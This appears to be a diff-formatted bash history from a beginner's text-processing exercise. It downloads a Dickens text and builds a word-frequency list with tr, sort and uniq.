md5sum +echo "hi potch" | md5sum +echo "hi patch" | md5sum +cat dist.combined.names +man tr +cat dist.combined.names | tr -cd [:upper:] [:lower:] +man tr +cat dist.combined.names | tr [:upper:] [:lower:] +ls +ll +cat text-sources.txt +wgets.cs.princeton.edu/java/data/dickens.txt +wc -l dickens.txt +wc -w dickens.txt +head dickens.txt +tail dickens.txt +cat dickens.txt | less +cat dickens.txt | tr -sc 'A-Za-z' '\12' | tr -d [:punct:] | tr [:upper:] [:lower:] +cat dickens.txt | tr -sc 'A-Za-z' '\12' | tr -d [:punct:] | tr [:upper:] [:lower:] | tr -d '\r' | sort | uniq -c | sort -nr > output_ngram.txt +cat output_ngram.txt +wc -l output_ngram.txt +output_ngram.txt +cat output_ngram.txt +head output_ngram.txt +tail output_ngram.txt +cat dickens.txt | grep -C 2 -i abbeville +cat dickens.txt | grep -C 4 -i abbeville +cat output_ngram.txt +cat output_ngram.txt | lolcat +cat output_ngram.txt | sort +man sort +cat output_ngram.txt | sort -n +cat dickens.txt | grep -i face +cat output_ngram.txt | wc -l +vim filename.txt +cat filename.txt +ls +w +pinky +history +pwd +cat .bash_history \ No newline at end of file